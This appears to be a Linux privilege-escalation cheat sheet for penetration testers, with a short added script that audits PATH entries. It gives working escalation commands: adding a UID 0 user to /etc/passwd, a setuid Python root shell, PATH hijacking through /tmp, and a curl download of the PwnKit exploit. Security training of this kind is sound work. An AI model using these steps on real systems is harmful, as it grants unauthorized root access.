Enumeration

Manual Enumeration

ID

When gaining initial access to a target, one of the first things we should identify is the user context. We can use the id command to gather user context information.

id

Membership of some groups can be abused for privilege escalation; see: Linux Groups Privilege Escalation

Users

Enumerate the users and try to access their accounts.

ls /home
cat /etc/passwd

Bash History

For every user, check the bash history in their home directory.

cat .bash_history

Sudoers

sudo -l

We can look up the allowed binaries on GTFOBins: https://gtfobins.github.io/gtfobins

SUID Privileges

We can use find to search for SUID-marked binaries.

find / -perm -u=s -type f 2>/dev/null

Once we find one, look it up on https://gtfobins.github.io/.

Read the strings contained in a binary

strings <path_to_binary>

Abuse of incorrectly implemented permissions

We can use find to identify files with insecure permissions.

Search for directories writable by the current user

find / -writable -type d 2>/dev/null

The following command looks for world-writable files and directories (excluding symlinks).

find / -not -type l -perm -o+w 2>/dev/null

One-liner to find world-writable files and directories, pruning /proc, /sys and /dev (null-separated so paths with spaces survive xargs)

find / \( -path /proc -o -path /sys -o -path /dev \) -prune -o \
-perm -o+w \( -type f -o -type d \) -print0 2>/dev/null | xargs -0 -r ls -ld --color=always

Abusing Password Authentication

If /etc/passwd is writable, a crypt-format hash can be placed directly in the password field of a new entry.

# Generate a crypt-format hash (default algorithm)
openssl passwd <PASSWORD>

# DES crypt
mkpasswd -m des <password>

# Append a UID 0 user whose password field holds the generated hash
echo "root2:<hash>:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

Add users to /etc/sudoers

user ALL=(ALL:ALL) ALL

Files belonging to the user

find / \( -user user -o -group user \) 2>/dev/null

Processes

We can list system processes (including those run by privileged users) with the ps command.

ps aux

Enumerate local ports

We can display active network connections and listening ports using either netstat or ss, both of which accept the same arguments.

ss -anp
netstat -tnlp

# BSD/macOS syntax (on Linux, -p takes no argument and shows the owning process)
netstat -na -p tcp

If we find listening ports that were not visible from our initial external scan, we should forward them to our machine and inspect the service behind them.

Cron Jobs

The Linux-based job scheduler is known as cron. Scheduled tasks are listed under the /etc/cron.* directories, where * represents the frequency at which the task will run.

ls -lah /etc/cron*
grep "CRON" /var/log/syslog

It is worth noting that system administrators often add their own scheduled tasks in the /etc/crontab file.

crontab -l
sudo crontab -l

Computer Information

To see the Linux distribution version and the kernel, run:

cat /etc/issue
cat /etc/os-release
uname -a
lsb_release -a

We can use the Linux Exploit Suggester tool.

Network

ip a
routel

Identifying Common Applications

To list applications installed by dpkg on a Debian-based system:

dpkg -l

Listing filesystems

cat /etc/fstab
mount

View disks

findmnt
lsblk
fdisk -l

Mount the disk on a folder to inspect its contents

mkdir -p /mnt/tmp
mount /dev/xvda1 /mnt/tmp

Detection and Exploitation of Capabilities

/usr/sbin/getcap -r / 2>/dev/null

Capabilities that can potentially escalate privileges

cap_dac_read_search

Allows reading any file on the system, bypassing file read permission checks

cap_setuid

Allows the process to change its UID

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

With this capability set on python 3.8, we can write a Python file that changes our UID and opens a shell:

import os
os.setuid(0)  # Switch to root user
os.system('/bin/bash')  # Spawn a root shell

motd.legal-displayed

If you find this file, there is an exploit for privesc: https://www.exploit-db.com/exploits/14339

Path Hijacking

$PATH is an environment variable that tells the system where to look for executables when you run a command without specifying its full path.

echo $PATH

Example output:

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

Each directory is separated by :. The system searches these directories from left to right when executing commands.

Look for scripts that call external commands without absolute paths, for example tar instead of /usr/bin/tar.

Modifying $PATH

You can add new directories at the beginning of $PATH to prioritize them:

export PATH="/tmp:$PATH"

Now, if an executable called tar exists in /tmp, it will run before the system's default tar.
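The following POSIX sh script is an added example (not part of the original notes) that does two things for the $PATH behaviour described above: resolve_in_path reproduces the left-to-right search to show which binary a bare command name would actually run, and audit_path flags PATH entries that make that lookup hijackable (empty or relative entries, missing directories, and directories writable by group or others). Function names and the output format are my own.

```shell
#!/bin/sh
# Added example, not part of the original notes: audit a PATH value for
# entries that make command lookup hijackable, and show how the left-to-right
# search decides which binary runs. POSIX sh; only ls and cut are needed.

# resolve_in_path NAME PATHVALUE
# Prints the first executable NAME found scanning PATHVALUE left to right,
# as the shell does for a command given without a slash. Returns 1 if none.
resolve_in_path() {
    name="$1"; rest="${2}:"                 # trailing ':' keeps an empty last entry
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"; rest="${rest#*:}"
        [ -n "$dir" ] || dir="."            # empty entry means the current directory
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            printf '%s\n' "$dir/$name"
            return 0
        fi
    done
    return 1
}

# audit_path PATHVALUE
# Prints one finding per risky entry and returns 1 if any were found.
# Risky: relative or empty entries, missing directories, and directories
# writable by group or others (mode bits taken from ls -ld).
audit_path() {
    rest="${1}:"; findings=0
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"; rest="${rest#*:}"
        case "$dir" in
            /*) ;;                           # absolute path, check it below
            *)  echo "RELATIVE: '$dir' resolves against the current directory"
                findings=$((findings + 1)); continue ;;
        esac
        if [ ! -d "$dir" ]; then
            echo "MISSING: $dir does not exist"
            findings=$((findings + 1)); continue
        fi
        mode=$(ls -ld "$dir" | cut -c1-10)   # e.g. drwxrwxrwt for /tmp
        case "$mode" in
            ?????w*|????????w*)              # group-write or other-write bit set
                echo "WRITABLE: $dir ($mode) can be modified by group/others"
                findings=$((findings + 1)) ;;
        esac
    done
    [ "$findings" -eq 0 ]
}
```

Run `audit_path "$PATH"` as the user a cron job or sudo rule executes as; a non-zero exit status means at least one entry in front of the system directories could be controlled by someone else, which is exactly the condition the /tmp example above relies on.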

Pkexec

Check if pkexec exists

which pkexec && ls -l $(which pkexec)

Check the package version

dpkg -l policykit-1 2>/dev/null | grep '^ii'

If the version was built before Jan 25, 2022, it’s likely vulnerable.

Exploit

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit

Automated Tools

  • http://pentestmonkey.net/tools/audit/unix-privesc-check

  • https://github.com/rebootuser/LinEnum

  • https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
